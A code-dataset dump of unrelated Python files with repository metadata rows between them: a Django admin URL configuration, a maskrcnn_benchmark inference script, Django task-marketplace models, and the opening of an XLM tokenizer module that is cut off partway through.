    TaskType_22_UpdateView, TaskType_23_UpdateView,
)

urlpatterns = [
    path('', index, name='index'),
    # Word CRUD
    path('elements/words/', WordListView.as_view(), name='word_list'),
    path('elements/words/create', WordCreateView.as_view(), name='word_create'),
    path('elements/words/update/<int:pk>/', WordUpdateView.as_view(), name='word_update'),
    path('elements/words/delete/<int:pk>/', WordDeleteView.as_view(), name='word_delete'),
    # Grammar CRUD
    path('elements/grammars/', GrammarListView.as_view(), name='grammar_list'),
    path('elements/grammars/create', GrammarCreateView.as_view(), name='grammar_create'),
    path('elements/grammars/update/<int:pk>/', GrammarUpdateView.as_view(), name='grammar_update'),
    path('elements/grammars/delete/<int:pk>/', GrammarDeleteView.as_view(), name='grammar_delete'),
    # Language CRUD
    path('structure/langs/', LangListView.as_view(), name='lang_list'),
    path('structure/langs/create/', LangCreateView.as_view(), name='lang_create'),
    path('structure/langs/update/<int:pk>/', LangUpdateView.as_view(), name='lang_update'),
    path('structure/langs/delete/<int:pk>/', LangDeleteView.as_view(), name='lang_delete'),
    # Course / topic / lesson CRUD (no list views)
    path('structure/courses/create/', CourseCreateView.as_view(), name='course_create'),
    path('structure/courses/update/<int:pk>/', CourseUpdateView.as_view(), name='course_update'),
    path('structure/courses/delete/<int:pk>/', CourseDeleteView.as_view(), name='course_delete'),
    path('structure/topics/create/', TopicCreateView.as_view(), name='topic_create'),
    path('structure/topics/update/<int:pk>/', TopicUpdateView.as_view(), name='topic_update'),
    path('structure/topics/delete/<int:pk>/', TopicDeleteView.as_view(), name='topic_delete'),
    path('structure/lessons/create/', LessonCreateView.as_view(), name='lesson_create'),
    path('structure/lessons/update/<int:pk>/', LessonUpdateView.as_view(), name='lesson_update'),
    path('structure/lessons/delete/<int:pk>/', LessonDeleteView.as_view(), name='lesson_delete'),
    # Task editing
    path('structure/tasks/update/<int:pk>/', TaskUpdateView.as_view(), name='task_update'),
    path('structure/tasks/update_with_ajax/<int:pk>/', task_update_with_ajax, name='task_update_with_ajax'),
    # One update URL per numbered task type; generated in order so the
    # resulting patterns and names are identical to the hand-written list.
    *[
        path(
            'structure/tasks/type_{0}/update/<int:pk>/'.format(num),
            view.as_view(),
            name='task_type_{0}_update'.format(num),
        )
        for num, view in enumerate(_TASK_TYPE_UPDATE_VIEWS, start=1)
    ],
    path('structure/tasks/delete/<int:pk>/', TaskDeleteView.as_view(), name='task_delete'),
]
| 68.95 | 115 | 0.658013 | from django.urls import path
from adminpanel.views import (index,
WordCreateView, WordListView, WordUpdateView, WordDeleteView,
GrammarCreateView, GrammarListView, GrammarUpdateView, GrammarDeleteView,
LangCreateView, LangListView, LangUpdateView, LangDeleteView,
CourseCreateView, CourseUpdateView, CourseDeleteView,
TopicCreateView, TopicUpdateView, TopicDeleteView,
LessonCreateView, LessonUpdateView, LessonDeleteView,
TaskUpdateView,
task_update_with_ajax,
TaskType_1_UpdateView,
TaskType_2_UpdateView,
TaskType_3_UpdateView,
TaskType_4_UpdateView,
TaskType_5_UpdateView,
TaskType_6_UpdateView,
TaskType_7_UpdateView,
TaskType_8_UpdateView,
TaskType_9_UpdateView,
TaskType_10_UpdateView,
TaskType_11_UpdateView,
TaskType_12_UpdateView,
TaskType_13_UpdateView,
TaskType_14_UpdateView,
TaskType_15_UpdateView,
TaskType_16_UpdateView,
TaskType_17_UpdateView,
TaskType_18_UpdateView,
TaskType_19_UpdateView,
TaskType_20_UpdateView,
TaskType_21_UpdateView,
TaskType_22_UpdateView,
TaskType_23_UpdateView,
TaskDeleteView)
app_name = 'adminpanel'
urlpatterns = [
path('', index, name='index'),
path('elements/words/', WordListView.as_view(), name='word_list'),
path('elements/words/create', WordCreateView.as_view(), name='word_create'),
path('elements/words/update/<int:pk>/', WordUpdateView.as_view(), name='word_update'),
path('elements/words/delete/<int:pk>/', WordDeleteView.as_view(), name='word_delete'),
path('elements/grammars/', GrammarListView.as_view(), name='grammar_list'),
path('elements/grammars/create', GrammarCreateView.as_view(), name='grammar_create'),
path('elements/grammars/update/<int:pk>/', GrammarUpdateView.as_view(), name='grammar_update'),
path('elements/grammars/delete/<int:pk>/', GrammarDeleteView.as_view(), name='grammar_delete'),
path('structure/langs/', LangListView.as_view(), name='lang_list'),
path('structure/langs/create/', LangCreateView.as_view(), name='lang_create'),
path('structure/langs/update/<int:pk>/', LangUpdateView.as_view(), name='lang_update'),
path('structure/langs/delete/<int:pk>/', LangDeleteView.as_view(), name='lang_delete'),
path('structure/courses/create/', CourseCreateView.as_view(), name='course_create'),
path('structure/courses/update/<int:pk>/', CourseUpdateView.as_view(), name='course_update'),
path('structure/courses/delete/<int:pk>/', CourseDeleteView.as_view(), name='course_delete'),
path('structure/topics/create/', TopicCreateView.as_view(), name='topic_create'),
path('structure/topics/update/<int:pk>/', TopicUpdateView.as_view(), name='topic_update'),
path('structure/topics/delete/<int:pk>/', TopicDeleteView.as_view(), name='topic_delete'),
path('structure/lessons/create/', LessonCreateView.as_view(), name='lesson_create'),
path('structure/lessons/update/<int:pk>/', LessonUpdateView.as_view(), name='lesson_update'),
path('structure/lessons/delete/<int:pk>/', LessonDeleteView.as_view(), name='lesson_delete'),
path('structure/tasks/update/<int:pk>/', TaskUpdateView.as_view(), name='task_update'),
path('structure/tasks/update_with_ajax/<int:pk>/', task_update_with_ajax, name='task_update_with_ajax'),
path('structure/tasks/type_1/update/<int:pk>/', TaskType_1_UpdateView.as_view(), name='task_type_1_update'),
path('structure/tasks/type_2/update/<int:pk>/', TaskType_2_UpdateView.as_view(), name='task_type_2_update'),
path('structure/tasks/type_3/update/<int:pk>/', TaskType_3_UpdateView.as_view(), name='task_type_3_update'),
path('structure/tasks/type_4/update/<int:pk>/', TaskType_4_UpdateView.as_view(), name='task_type_4_update'),
path('structure/tasks/type_5/update/<int:pk>/', TaskType_5_UpdateView.as_view(), name='task_type_5_update'),
path('structure/tasks/type_6/update/<int:pk>/', TaskType_6_UpdateView.as_view(), name='task_type_6_update'),
path('structure/tasks/type_7/update/<int:pk>/', TaskType_7_UpdateView.as_view(), name='task_type_7_update'),
path('structure/tasks/type_8/update/<int:pk>/', TaskType_8_UpdateView.as_view(), name='task_type_8_update'),
path('structure/tasks/type_9/update/<int:pk>/', TaskType_9_UpdateView.as_view(), name='task_type_9_update'),
path('structure/tasks/type_10/update/<int:pk>/', TaskType_10_UpdateView.as_view(), name='task_type_10_update'),
path('structure/tasks/type_11/update/<int:pk>/', TaskType_11_UpdateView.as_view(), name='task_type_11_update'),
path('structure/tasks/type_12/update/<int:pk>/', TaskType_12_UpdateView.as_view(), name='task_type_12_update'),
path('structure/tasks/type_13/update/<int:pk>/', TaskType_13_UpdateView.as_view(), name='task_type_13_update'),
path('structure/tasks/type_14/update/<int:pk>/', TaskType_14_UpdateView.as_view(), name='task_type_14_update'),
path('structure/tasks/type_15/update/<int:pk>/', TaskType_15_UpdateView.as_view(), name='task_type_15_update'),
path('structure/tasks/type_16/update/<int:pk>/', TaskType_16_UpdateView.as_view(), name='task_type_16_update'),
path('structure/tasks/type_17/update/<int:pk>/', TaskType_17_UpdateView.as_view(), name='task_type_17_update'),
path('structure/tasks/type_18/update/<int:pk>/', TaskType_18_UpdateView.as_view(), name='task_type_18_update'),
path('structure/tasks/type_19/update/<int:pk>/', TaskType_19_UpdateView.as_view(), name='task_type_19_update'),
path('structure/tasks/type_20/update/<int:pk>/', TaskType_20_UpdateView.as_view(), name='task_type_20_update'),
path('structure/tasks/type_21/update/<int:pk>/', TaskType_21_UpdateView.as_view(), name='task_type_21_update'),
path('structure/tasks/type_22/update/<int:pk>/', TaskType_22_UpdateView.as_view(), name='task_type_22_update'),
path('structure/tasks/type_23/update/<int:pk>/', TaskType_23_UpdateView.as_view(), name='task_type_23_update'),
path('structure/tasks/delete/<int:pk>/', TaskDeleteView.as_view(), name='task_delete'),
]
| true | true |
f723120659cd05c6e7b6ba54ecc282693e50d44a | 4,157 | py | Python | object_detection/pytorch/tools/test_net.py | lamyiowce/training | da4c959b5a7b65091b850872cdd4014d768c087c | [
"Apache-2.0"
] | 567 | 2018-09-13T05:07:49.000Z | 2020-11-23T11:52:11.000Z | object_detection/pytorch/tools/test_net.py | lamyiowce/training | da4c959b5a7b65091b850872cdd4014d768c087c | [
"Apache-2.0"
] | 222 | 2018-09-14T10:15:39.000Z | 2020-11-20T22:21:09.000Z | object_detection/pytorch/tools/test_net.py | ltechkorea/mlperf-training | 498b945dd914573bdbf7a871eaeebd9388b60b76 | [
"Apache-2.0"
] | 279 | 2018-09-16T12:40:29.000Z | 2020-11-17T14:22:52.000Z | # Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
# Set up custom environment before nearly anything else is imported
# NOTE: this should be the first import (no not reorder)
from maskrcnn_benchmark.utils.env import setup_environment # noqa F401 isort:skip
import argparse
import os
import torch
from maskrcnn_benchmark.config import cfg
from maskrcnn_benchmark.data import make_data_loader
from maskrcnn_benchmark.engine.inference import inference
from maskrcnn_benchmark.modeling.detector import build_detection_model
from maskrcnn_benchmark.utils.checkpoint import DetectronCheckpointer
from maskrcnn_benchmark.utils.collect_env import collect_env_info
from maskrcnn_benchmark.utils.comm import synchronize, get_rank
from maskrcnn_benchmark.utils.logger import setup_logger
from maskrcnn_benchmark.utils.miscellaneous import mkdir
def main():
    """Entry point: run inference/evaluation for a trained detection model.

    Parses the config file plus command-line overrides, optionally
    initializes multi-GPU distributed inference (NCCL, env:// rendezvous),
    loads the checkpointed weights, and evaluates every dataset listed in
    cfg.DATASETS.TEST.
    """
    parser = argparse.ArgumentParser(description="PyTorch Object Detection Inference")
    parser.add_argument(
        "--config-file",
        default="/private/home/fmassa/github/detectron.pytorch_v2/configs/e2e_faster_rcnn_R_50_C4_1x_caffe2.yaml",
        metavar="FILE",
        help="path to config file",
    )
    parser.add_argument("--local_rank", type=int, default=0)
    parser.add_argument(
        "opts",
        help="Modify config options using the command-line",
        default=None,
        nargs=argparse.REMAINDER,
    )
    args = parser.parse_args()
    # WORLD_SIZE is set by the distributed launcher; more than one process
    # means we are running distributed inference.
    num_gpus = int(os.environ["WORLD_SIZE"]) if "WORLD_SIZE" in os.environ else 1
    distributed = num_gpus > 1
    if distributed:
        torch.cuda.set_device(args.local_rank)
        torch.distributed.init_process_group(
            backend="nccl", init_method="env://"
        )
        synchronize()
    # Apply file config first, then CLI overrides, then make cfg immutable.
    cfg.merge_from_file(args.config_file)
    cfg.merge_from_list(args.opts)
    cfg.freeze()
    save_dir = ""  # empty => logger writes to the console only, no log file
    logger = setup_logger("maskrcnn_benchmark", save_dir, get_rank())
    logger.info("Using {} GPUs".format(num_gpus))
    logger.info(cfg)
    logger.info("Collecting env info (might take some time)")
    logger.info("\n" + collect_env_info())
    model = build_detection_model(cfg)
    model.to(cfg.MODEL.DEVICE)
    # Load the trained weights; the returned checkpoint dict is not needed.
    output_dir = cfg.OUTPUT_DIR
    checkpointer = DetectronCheckpointer(cfg, model, save_dir=output_dir)
    _ = checkpointer.load(cfg.MODEL.WEIGHT)
    # Always evaluate boxes; add mask/keypoint metrics if the model has them.
    iou_types = ("bbox",)
    if cfg.MODEL.MASK_ON:
        iou_types = iou_types + ("segm",)
    if cfg.MODEL.KEYPOINT_ON:
        iou_types = iou_types + ("keypoints",)
    # One (optional) output folder per test dataset, under OUTPUT_DIR/inference.
    output_folders = [None] * len(cfg.DATASETS.TEST)
    dataset_names = cfg.DATASETS.TEST
    if cfg.OUTPUT_DIR:
        for idx, dataset_name in enumerate(dataset_names):
            output_folder = os.path.join(cfg.OUTPUT_DIR, "inference", dataset_name)
            mkdir(output_folder)
            output_folders[idx] = output_folder
    data_loaders_val = make_data_loader(cfg, is_train=False, is_distributed=distributed)
    for output_folder, dataset_name, data_loader_val in zip(output_folders, dataset_names, data_loaders_val):
        inference(
            model,
            data_loader_val,
            dataset_name=dataset_name,
            iou_types=iou_types,
            box_only=False if cfg.MODEL.RETINANET_ON else cfg.MODEL.RPN_ONLY,
            device=cfg.MODEL.DEVICE,
            expected_results=cfg.TEST.EXPECTED_RESULTS,
            expected_results_sigma_tol=cfg.TEST.EXPECTED_RESULTS_SIGMA_TOL,
            output_folder=output_folder,
        )
        # Keep all ranks in step before starting the next dataset.
        synchronize()


if __name__ == "__main__":
    main()
| 37.45045 | 114 | 0.718547 |
from maskrcnn_benchmark.utils.env import setup_environment
import argparse
import os
import torch
from maskrcnn_benchmark.config import cfg
from maskrcnn_benchmark.data import make_data_loader
from maskrcnn_benchmark.engine.inference import inference
from maskrcnn_benchmark.modeling.detector import build_detection_model
from maskrcnn_benchmark.utils.checkpoint import DetectronCheckpointer
from maskrcnn_benchmark.utils.collect_env import collect_env_info
from maskrcnn_benchmark.utils.comm import synchronize, get_rank
from maskrcnn_benchmark.utils.logger import setup_logger
from maskrcnn_benchmark.utils.miscellaneous import mkdir
def main():
    """Entry point: parse CLI arguments, build the detection model from the
    (possibly overridden) config, restore its checkpoint and run inference
    over every configured test dataset, optionally under torch.distributed."""
    parser = argparse.ArgumentParser(description="PyTorch Object Detection Inference")
    parser.add_argument(
        "--config-file",
        default="/private/home/fmassa/github/detectron.pytorch_v2/configs/e2e_faster_rcnn_R_50_C4_1x_caffe2.yaml",
        metavar="FILE",
        help="path to config file",
    )
    parser.add_argument("--local_rank", type=int, default=0)
    parser.add_argument(
        "opts",
        help="Modify config options using the command-line",
        default=None,
        nargs=argparse.REMAINDER,
    )
    cli_args = parser.parse_args()

    # torch.distributed launchers export WORLD_SIZE; absent means single GPU.
    world_size = int(os.environ.get("WORLD_SIZE", "1"))
    is_distributed = world_size > 1
    if is_distributed:
        torch.cuda.set_device(cli_args.local_rank)
        torch.distributed.init_process_group(
            backend="nccl", init_method="env://"
        )
        synchronize()

    # Layer the config: base file, then command-line overrides, then freeze.
    cfg.merge_from_file(cli_args.config_file)
    cfg.merge_from_list(cli_args.opts)
    cfg.freeze()

    logger = setup_logger("maskrcnn_benchmark", "", get_rank())
    logger.info("Using {} GPUs".format(world_size))
    logger.info(cfg)
    logger.info("Collecting env info (might take some time)")
    logger.info("\n" + collect_env_info())

    model = build_detection_model(cfg)
    model.to(cfg.MODEL.DEVICE)

    # Restore the checkpoint named by the config.
    checkpointer = DetectronCheckpointer(cfg, model, save_dir=cfg.OUTPUT_DIR)
    _ = checkpointer.load(cfg.MODEL.WEIGHT)

    # Always evaluate boxes; add masks/keypoints only if those heads exist.
    eval_types = ["bbox"]
    if cfg.MODEL.MASK_ON:
        eval_types.append("segm")
    if cfg.MODEL.KEYPOINT_ON:
        eval_types.append("keypoints")
    iou_types = tuple(eval_types)

    dataset_names = cfg.DATASETS.TEST
    output_folders = [None] * len(dataset_names)
    if cfg.OUTPUT_DIR:
        # One inference sub-folder per test dataset.
        for idx, dataset_name in enumerate(dataset_names):
            folder = os.path.join(cfg.OUTPUT_DIR, "inference", dataset_name)
            mkdir(folder)
            output_folders[idx] = folder

    data_loaders_val = make_data_loader(cfg, is_train=False, is_distributed=is_distributed)
    for output_folder, dataset_name, data_loader_val in zip(output_folders, dataset_names, data_loaders_val):
        inference(
            model,
            data_loader_val,
            dataset_name=dataset_name,
            iou_types=iou_types,
            box_only=False if cfg.MODEL.RETINANET_ON else cfg.MODEL.RPN_ONLY,
            device=cfg.MODEL.DEVICE,
            expected_results=cfg.TEST.EXPECTED_RESULTS,
            expected_results_sigma_tol=cfg.TEST.EXPECTED_RESULTS_SIGMA_TOL,
            output_folder=output_folder,
        )
        synchronize()


if __name__ == "__main__":
    main()
| true | true |
f72312f03eb453b8f96cce81038cab6260ed892a | 3,125 | py | Python | backend/task/models.py | crowdbotics-apps/mediku-29462 | d8940002577bc39984ea5ed4367d0aaa68238ae0 | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | backend/task/models.py | crowdbotics-apps/mediku-29462 | d8940002577bc39984ea5ed4367d0aaa68238ae0 | [
"FTL",
"AML",
"RSA-MD"
] | 27 | 2021-08-08T20:40:05.000Z | 2021-10-06T01:54:51.000Z | backend/task/models.py | crowdbotics-apps/mediku-29462 | d8940002577bc39984ea5ed4367d0aaa68238ae0 | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | from django.conf import settings
from django.db import models
class TaskTransaction(models.Model):
    """One recorded occurrence/execution of a Task (auto-generated model)."""
    # Free-form state label, at most 10 characters (allowed values not visible here).
    status = models.CharField(
        max_length=10,
    )
    # Nullable completion time -- presumably unset until the run finishes (TODO confirm).
    timestamp_completed = models.DateTimeField(
        null=True,
        blank=True,
    )
    # Owning task; CASCADE deletes transactions together with their task.
    task = models.ForeignKey(
        "task.Task",
        null=True,
        blank=True,
        on_delete=models.CASCADE,
        related_name="tasktransaction_task",
    )
    # Calendar date this transaction is associated with.
    date = models.DateField(
        null=True,
        blank=True,
    )
    # Nullable start time -- presumably unset until the run begins (TODO confirm).
    timestamp_started = models.DateTimeField(
        null=True,
        blank=True,
    )
class Message(models.Model):
    """A text message linking a customer and a tasker (auto-generated model)."""
    # Customer participant; row is deleted together with the customer profile.
    customer = models.ForeignKey(
        "task_profile.CustomerProfile",
        on_delete=models.CASCADE,
        related_name="message_customer",
    )
    # Tasker participant; row is deleted together with the tasker profile.
    tasker = models.ForeignKey(
        "task_profile.TaskerProfile",
        on_delete=models.CASCADE,
        related_name="message_tasker",
    )
    # Message body (unbounded text).
    message = models.TextField()
    # Set once, automatically, when the row is created.
    timestamp_created = models.DateTimeField(
        auto_now_add=True,
    )
    # Optional related task; SET_NULL keeps the message if the task is deleted.
    task = models.ForeignKey(
        "task.Task",
        null=True,
        blank=True,
        on_delete=models.SET_NULL,
        related_name="message_task",
    )
class Rating(models.Model):
    """A customer's numeric score (plus optional review text) of a tasker (auto-generated model)."""
    # Tasker being rated; row is deleted together with the tasker profile.
    tasker = models.ForeignKey(
        "task_profile.TaskerProfile",
        on_delete=models.CASCADE,
        related_name="rating_tasker",
    )
    # Numeric score; range is not constrained at the model level.
    rating = models.FloatField()
    # Set once, automatically, when the row is created.
    timestamp_created = models.DateTimeField(
        auto_now_add=True,
    )
    # Optional free-text review accompanying the score.
    review = models.TextField(
        null=True,
        blank=True,
    )
    # Rating author; SET_NULL keeps the rating if the customer is deleted.
    customer = models.ForeignKey(
        "task_profile.CustomerProfile",
        null=True,
        blank=True,
        on_delete=models.SET_NULL,
        related_name="rating_customer",
    )
class Task(models.Model):
    """A job requested by a customer and assigned to a tasker (auto-generated model)."""
    # Requesting customer; row is deleted together with the customer profile.
    customer = models.ForeignKey(
        "task_profile.CustomerProfile",
        on_delete=models.CASCADE,
        related_name="task_customer",
    )
    # Assigned tasker; row is deleted together with the tasker profile.
    tasker = models.ForeignKey(
        "task_profile.TaskerProfile",
        on_delete=models.CASCADE,
        related_name="task_tasker",
    )
    # Top-level category; row is deleted together with the category.
    category = models.ForeignKey(
        "task_category.Category",
        on_delete=models.CASCADE,
        related_name="task_category",
    )
    # Free-text description of the requested work.
    details = models.TextField()
    # Short code, max 7 chars (allowed values not visible here).
    frequency = models.CharField(
        max_length=7,
    )
    # Short code, max 6 chars (allowed values not visible here).
    size = models.CharField(
        max_length=6,
    )
    # Exactly one location per task; row is deleted together with the location.
    location = models.OneToOneField(
        "location.TaskLocation",
        on_delete=models.CASCADE,
        related_name="task_location",
    )
    # Whether the task has been confirmed (see timestamp_confirmed below).
    is_confirmed = models.BooleanField()
    # Free-form state label, at most 10 characters.
    status = models.CharField(
        max_length=10,
    )
    # Set once, automatically, when the row is created.
    timestamp_created = models.DateTimeField(
        auto_now_add=True,
    )
    # Nullable confirmation time.
    timestamp_confirmed = models.DateTimeField(
        null=True,
        blank=True,
    )
    # Optional finer-grained category; CASCADE with the subcategory.
    subcategory = models.ForeignKey(
        "task_category.Subcategory",
        null=True,
        blank=True,
        on_delete=models.CASCADE,
        related_name="task_subcategory",
    )
# Create your models here.
| 24.038462 | 47 | 0.61984 | from django.conf import settings
from django.db import models
class TaskTransaction(models.Model):
    """One recorded occurrence/execution of a Task."""
    # Free-form state label, at most 10 characters (allowed values not visible here).
    status = models.CharField(
        max_length=10,
    )
    # Nullable completion time -- presumably unset until the run finishes (TODO confirm).
    timestamp_completed = models.DateTimeField(
        null=True,
        blank=True,
    )
    # Owning task; CASCADE deletes transactions together with their task.
    task = models.ForeignKey(
        "task.Task",
        null=True,
        blank=True,
        on_delete=models.CASCADE,
        related_name="tasktransaction_task",
    )
    # Calendar date this transaction is associated with.
    date = models.DateField(
        null=True,
        blank=True,
    )
    # Nullable start time -- presumably unset until the run begins (TODO confirm).
    timestamp_started = models.DateTimeField(
        null=True,
        blank=True,
    )
class Message(models.Model):
    """A text message linking a customer and a tasker."""
    # Customer participant; row is deleted together with the customer profile.
    customer = models.ForeignKey(
        "task_profile.CustomerProfile",
        on_delete=models.CASCADE,
        related_name="message_customer",
    )
    # Tasker participant; row is deleted together with the tasker profile.
    tasker = models.ForeignKey(
        "task_profile.TaskerProfile",
        on_delete=models.CASCADE,
        related_name="message_tasker",
    )
    # Message body (unbounded text).
    message = models.TextField()
    # Set once, automatically, when the row is created.
    timestamp_created = models.DateTimeField(
        auto_now_add=True,
    )
    # Optional related task; SET_NULL keeps the message if the task is deleted.
    task = models.ForeignKey(
        "task.Task",
        null=True,
        blank=True,
        on_delete=models.SET_NULL,
        related_name="message_task",
    )
class Rating(models.Model):
    """A customer's numeric score (plus optional review text) of a tasker."""
    # Tasker being rated; row is deleted together with the tasker profile.
    tasker = models.ForeignKey(
        "task_profile.TaskerProfile",
        on_delete=models.CASCADE,
        related_name="rating_tasker",
    )
    # Numeric score; range is not constrained at the model level.
    rating = models.FloatField()
    # Set once, automatically, when the row is created.
    timestamp_created = models.DateTimeField(
        auto_now_add=True,
    )
    # Optional free-text review accompanying the score.
    review = models.TextField(
        null=True,
        blank=True,
    )
    # Rating author; SET_NULL keeps the rating if the customer is deleted.
    customer = models.ForeignKey(
        "task_profile.CustomerProfile",
        null=True,
        blank=True,
        on_delete=models.SET_NULL,
        related_name="rating_customer",
    )
class Task(models.Model):
    """A job requested by a customer and assigned to a tasker."""
    # Requesting customer; row is deleted together with the customer profile.
    customer = models.ForeignKey(
        "task_profile.CustomerProfile",
        on_delete=models.CASCADE,
        related_name="task_customer",
    )
    # Assigned tasker; row is deleted together with the tasker profile.
    tasker = models.ForeignKey(
        "task_profile.TaskerProfile",
        on_delete=models.CASCADE,
        related_name="task_tasker",
    )
    # Top-level category; row is deleted together with the category.
    category = models.ForeignKey(
        "task_category.Category",
        on_delete=models.CASCADE,
        related_name="task_category",
    )
    # Free-text description of the requested work.
    details = models.TextField()
    # Short code, max 7 chars (allowed values not visible here).
    frequency = models.CharField(
        max_length=7,
    )
    # Short code, max 6 chars (allowed values not visible here).
    size = models.CharField(
        max_length=6,
    )
    # Exactly one location per task; row is deleted together with the location.
    location = models.OneToOneField(
        "location.TaskLocation",
        on_delete=models.CASCADE,
        related_name="task_location",
    )
    # Whether the task has been confirmed (see timestamp_confirmed below).
    is_confirmed = models.BooleanField()
    # Free-form state label, at most 10 characters.
    status = models.CharField(
        max_length=10,
    )
    # Set once, automatically, when the row is created.
    timestamp_created = models.DateTimeField(
        auto_now_add=True,
    )
    # Nullable confirmation time.
    timestamp_confirmed = models.DateTimeField(
        null=True,
        blank=True,
    )
    # Optional finer-grained category; CASCADE with the subcategory.
    subcategory = models.ForeignKey(
        "task_category.Subcategory",
        null=True,
        blank=True,
        on_delete=models.CASCADE,
        related_name="task_subcategory",
    )
| true | true |
f7231384b31af5980487157a907ab2c53e33945b | 35,093 | py | Python | pytorch_transformers/tokenization_xlm.py | clinia/K-Adapter | 7f46ae48d7941e519fb40ae62ac46e62115faaf5 | [
"MIT"
] | 98 | 2020-12-26T04:47:03.000Z | 2022-03-31T06:06:53.000Z | all_exp/kadapter/examples/pytorch_transformers/tokenization_xlm.py | yifan-h/GCS_KI | 5d5c68832aa37cefb1d01723c35fc3d74482c8c2 | [
"MIT"
] | 15 | 2020-11-30T09:57:09.000Z | 2022-03-30T13:56:43.000Z | all_exp/kadapter/examples/pytorch_transformers/tokenization_xlm.py | yifan-h/GCS_KI | 5d5c68832aa37cefb1d01723c35fc3d74482c8c2 | [
"MIT"
] | 23 | 2020-10-30T06:07:24.000Z | 2022-03-30T22:26:33.000Z | # coding=utf-8
# Copyright 2019 The Open AI Team Authors and The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tokenization classes for OpenAI GPT."""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import json
import logging
import os
import re
import sys
import unicodedata
from io import open
import sacremoses as sm
from .tokenization_utils import PreTrainedTokenizer
from .tokenization_bert import BasicTokenizer
logger = logging.getLogger(__name__)
# On-disk file names that make up a saved XLM tokenizer:
# the JSON token->id vocabulary and the BPE merge table.
VOCAB_FILES_NAMES = {
    'vocab_file': 'vocab.json',
    'merges_file': 'merges.txt',
}
# Download URLs of the vocabulary / BPE-merge files for each pretrained checkpoint.
# NOTE(review): the CLM entries deliberately point at the MLM merge files --
# presumably the merge tables are shared across objectives; confirm against the hub.
PRETRAINED_VOCAB_FILES_MAP = {
    'vocab_file':
    {
        'xlm-mlm-en-2048': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-en-2048-vocab.json",
        'xlm-mlm-ende-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-ende-1024-vocab.json",
        'xlm-mlm-enfr-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-enfr-1024-vocab.json",
        'xlm-mlm-enro-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-enro-1024-vocab.json",
        'xlm-mlm-tlm-xnli15-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-tlm-xnli15-1024-vocab.json",
        'xlm-mlm-xnli15-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-xnli15-1024-vocab.json",
        'xlm-clm-enfr-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-clm-enfr-1024-vocab.json",
        'xlm-clm-ende-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-clm-ende-1024-vocab.json",
        'xlm-mlm-17-1280': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-17-1280-vocab.json",
        'xlm-mlm-100-1280': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-100-1280-vocab.json",
    },
    'merges_file':
    {
        'xlm-mlm-en-2048': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-en-2048-merges.txt",
        'xlm-mlm-ende-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-ende-1024-merges.txt",
        'xlm-mlm-enfr-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-enfr-1024-merges.txt",
        'xlm-mlm-enro-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-enro-1024-merges.txt",
        'xlm-mlm-tlm-xnli15-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-tlm-xnli15-1024-merges.txt",
        'xlm-mlm-xnli15-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-xnli15-1024-merges.txt",
        'xlm-clm-enfr-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-enfr-1024-merges.txt",
        'xlm-clm-ende-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-ende-1024-merges.txt",
        'xlm-mlm-17-1280': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-17-1280-merges.txt",
        'xlm-mlm-100-1280': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-100-1280-merges.txt",
    },
}
# Maximum input length (number of positions) supported by each pretrained model.
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
    'xlm-mlm-en-2048': 512,
    'xlm-mlm-ende-1024': 512,
    'xlm-mlm-enfr-1024': 512,
    'xlm-mlm-enro-1024': 512,
    'xlm-mlm-tlm-xnli15-1024': 512,
    'xlm-mlm-xnli15-1024': 512,
    'xlm-clm-enfr-1024': 512,
    'xlm-clm-ende-1024': 512,
    'xlm-mlm-17-1280': 512,
    'xlm-mlm-100-1280': 512,
}
PRETRAINED_INIT_CONFIGURATION = {
'xlm-mlm-en-2048': {"do_lowercase_and_remove_accent": True},
'xlm-mlm-ende-1024': { "do_lowercase_and_remove_accent": True,
"id2lang": { "0": "de",
"1": "en"},
"lang2id": { "de": 0,
"en": 1 }},
'xlm-mlm-enfr-1024': { "do_lowercase_and_remove_accent": True,
"id2lang": { "0": "en",
"1": "fr"},
"lang2id": { "en": 0,
"fr": 1 }},
'xlm-mlm-enro-1024': { "do_lowercase_and_remove_accent": True,
"id2lang": { "0": "en",
"1": "ro"},
"lang2id": { "en": 0,
"ro": 1 }},
'xlm-mlm-tlm-xnli15-1024': { "do_lowercase_and_remove_accent": True,
"id2lang": { "0": "ar",
"1": "bg",
"2": "de",
